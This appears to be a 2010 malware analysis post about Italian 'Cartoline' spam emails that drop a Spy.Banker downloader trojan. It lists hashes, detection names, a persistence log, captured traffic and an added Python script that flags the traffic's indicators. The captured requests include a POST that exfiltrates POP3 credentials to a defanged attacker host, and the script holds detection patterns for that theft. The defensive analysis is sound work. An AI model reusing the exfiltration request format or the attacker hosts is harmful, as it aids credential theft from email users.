Spam emails Cartoline.exe spread Spy.Banker Trojan

In recent days we have registered a new wave of spam messages with the subject “Cartoline” that appeared to come from virgilio.it and contained a link that seemed to redirect the user to legitimate sites such as cards.virgilio.it. After analyzing the HTML of the message, we noticed that the link actually redirected to a malicious web site that had nothing to do with virgilio.it. After clicking the malicious link, the user was presented with a dialog to download a file named cartoline.exe:

Screenshot

The mere fact that an email message promoting postcards redirects the user to download an executable file is very suspicious, and in fact the file is infected with malware:

File name: cartoline.exe
File size: 601600 bytes
MD5 hash: 92a9346604726a7d26a51d3509f806e4
SHA1 hash: 8d6817f4d365419b1cd2ac07c8035798d94d0d6e
Detection rate: 9 of 20 (45%)
Status: INFECTED

a-squared 15/05/2010 5.0.0.7 Trojan-Downloader.Win32.Banload!IK
AVG 271.1.1/2877 9.0.0.725 Downloader.Agent2.WWA
Avira AntiVir 7.10.7.111 7.6.0.59 TR/Spy.Banker.Gen
Comodo 3468 3.13.579 Heur.Pck.Enigma
F-PROT6 20100515 4.5.1.85 W32/Heuristic-DL1!Eldorado
G-Data 21.171 2.0.7309.847 Trojan-Downloader.Win32.Agent.dqkq A
Ikarus T3 16/05/2010 1.1.84.0 Trojan-Downloader.Win32.Banload
Kaspersky 16/05/2010 9.0.0.736 Trojan-Downloader.Win32.Agent.dqkq
TrendMicro 171 9.120-1004 Mal_Banker

We can see the malware's activity by analyzing the log file generated with Hijack Hunter:

[+] Running processes
 
C:\windows\wain.exe (2060288 bytes) (Unknown) (5/14/2010 7:54:05 PM) (--A-) (746adf360cb07eb058d1a0fcf1a19603)
 
[+] Registry startups
 
Value: Win32
Data: C:\windows\wain.exe
Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
 
[+] Files created/modified 15 days ago
 
C:\WINDOWS\nvsvs.exe (1033216 bytes) (Unknown) (5/14/2010 7:53:34 PM) (--A-) (613feb50b850e0695c47b81a383caf28) (Created)
C:\WINDOWS\wain.exe (2060288 bytes) (Unknown) (5/14/2010 7:54:05 PM) (--A-) (746adf360cb07eb058d1a0fcf1a19603) (Created)
C:\WINDOWS\wilps.exe (806400 bytes) (Unknown) (5/14/2010 7:55:16 PM) (--A-) (9e78023032221f2955e95d7394531245) (Created)

Screenshot

Network traffic:

POST /images/wab.php HTTP/1.0
Host: indiegear(dot)org
User-Agent: Mozilla/3.0 (compatible; Indy Library)
----------051410195548264
Content-Disposition: form-data; name="texto"
POP3(Identi):Pass(........L.......); 
-----------------------------
----------051410195548264--

From the traffic above we can see that the malware is a password stealer: it sent data related to a POP3 account to the malicious host through a POST request to /images/wab.php.

GET /images/heade.gif HTTP/1.1
User-Agent: nvsvs.exe
Host: junipero(dot)com(dot)br
 
GET /IT/contador.php HTTP/1.1
Host: www.richardmata(dot)xpg(dot)com(dot)br

From the response to the last GET query we can see this:

Estamos com 372 visitas

This message (Portuguese for “we have 372 visits”) should be the total number of users who have clicked the malicious link in the email and been infected by the malware.

GET /midia/list.gif HTTP/1.1
User-Agent: nvsvs.exe
Host: mariogesteiracosta(dot)com(dot)br
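The captured traffic above has two traits a proxy or IDS log review can key on: a POST of multipart form data to a PHP script from the Indy Library default User-Agent carrying a POP3 user/password pair, and GET requests whose User-Agent is just a binary name (nvsvs.exe). The following Python triage script is an added example written for this post, not code from the original analysis; it parses raw HTTP requests and reports which of those indicators each one matches. The sample requests, hosts and the account in them are constructed placeholders modelled on the capture.

```python
import re

# Heuristics taken from the traffic the infected host generated (see above).
EXE_UA = re.compile(r"^[\w.-]+\.exe$", re.IGNORECASE)      # User-Agent is just a binary name
INDY_UA = re.compile(r"Indy Library", re.IGNORECASE)        # default UA of Delphi's Indy stack
CRED_FIELD = re.compile(r"\b(?:POP3|IMAP|SMTP)\([^)]*\):Pass\(")  # POP3(user):Pass(secret);


def parse_request(raw: str) -> dict:
    """Split a raw HTTP request into method, path, lower-cased headers and body."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    lines = head.splitlines()
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": path, "headers": headers, "body": body}


def triage(raw: str) -> list:
    """Return the list of indicators matched by one request (empty = nothing suspicious)."""
    req = parse_request(raw)
    ua = req["headers"].get("user-agent", "")
    findings = []
    if EXE_UA.match(ua):
        findings.append("executable name used as User-Agent: " + ua)
    if req["method"] == "POST" and INDY_UA.search(ua) and req["path"].endswith(".php"):
        findings.append("Indy Library POST to PHP endpoint " + req["path"])
    if CRED_FIELD.search(req["body"]):
        findings.append("mail credentials in POST body")
    return findings


# Constructed samples modelled on the captured traffic; hosts and account are placeholders.
SAMPLE_POST = (
    "POST /images/wab.php HTTP/1.0\r\nHost: c2.example.invalid\r\n"
    "User-Agent: Mozilla/3.0 (compatible; Indy Library)\r\n\r\n"
    "----------051410195548264\r\nContent-Disposition: form-data; name=\"texto\"\r\n\r\n"
    "POP3(victim@mail.invalid):Pass(hunter2);\r\n----------051410195548264--\r\n"
)
SAMPLE_GET = "GET /images/heade.gif HTTP/1.1\r\nUser-Agent: nvsvs.exe\r\nHost: dl.example.invalid\r\n\r\n"
SAMPLE_BENIGN = "GET /index.html HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 5.1)\r\nHost: www.example.invalid\r\n\r\n"

if __name__ == "__main__":
    for name, sample in [("POST", SAMPLE_POST), ("GET", SAMPLE_GET), ("benign", SAMPLE_BENIGN)]:
        print(name, triage(sample))
```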

As always, pay attention when reading email, even if you think the sender's address is legitimate. Remember never to click unknown links, and always examine the HTML code of the email to better understand where a link may redirect.
